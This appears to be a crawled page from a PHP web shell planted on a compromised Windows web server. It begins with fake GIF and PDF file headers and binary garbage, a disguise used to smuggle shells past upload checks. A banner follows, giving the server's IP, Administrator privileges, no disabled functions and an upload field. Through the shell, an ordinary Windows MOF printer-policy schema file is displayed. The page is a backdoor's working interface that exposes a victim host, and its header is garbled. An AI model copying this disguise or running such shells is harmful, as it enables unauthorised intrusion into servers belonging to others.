GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /Windows/System32/wbem/ |
Upload File : |
//------------------------------------------------ // RSOP_PushPrinterConnectionsPolicySetting // Comment: Abtraction for PPC extension policy data //------------------------------------------------ // During setup, run twice // mofcomp -N:\\.\root\RSOP\computer "RsopSchema.mof" // mofcomp -N:\\.\root\RSOP\user "RsopSchema.mof" // #pragma autorecover #pragma namespace("\\\\.\\root\\RSOP\\computer") [ Locale( 0x409 ), Description("Policy object for PPc") ] class RSOP_PushPrinterConnectionsPolicySetting: RSOP_PolicySetting { [ key, Description("Inherited from RSOP_PolicySetting"), Read, DisplayName("ID") ] string id; [ key, Description("Inherited from RSOP_PolicySetting"), Read, DisplayName("Precedence") ] uint32 precedence; [ Description("Printer name,"), Read, DisplayName("Printer name") ] string printerName = ""; [ Description("Short server name"), Read, DisplayName("Server name") ] string serverName = ""; [ Description("Short server name"), Read, DisplayName("Network name") ] string uncName = ""; [ ValueMap {"1", "2"}, Values { "User connection", "Machine connection"}, Description("Whether the the connection is applied per machine, per user" "1 = User, 2 = Machine."), Read, DisplayName("Connection Type") ] uint32 ConnectionType = 1; [ Description("Indicates whether the print connection" "has been deleted."), Read, DisplayName("Is deleted") ] boolean deleted = false; [ Description("The final result of pushed printer connection. 0 indicate success"), Read, DisplayName("PushResult") ] uint32 PushResult; };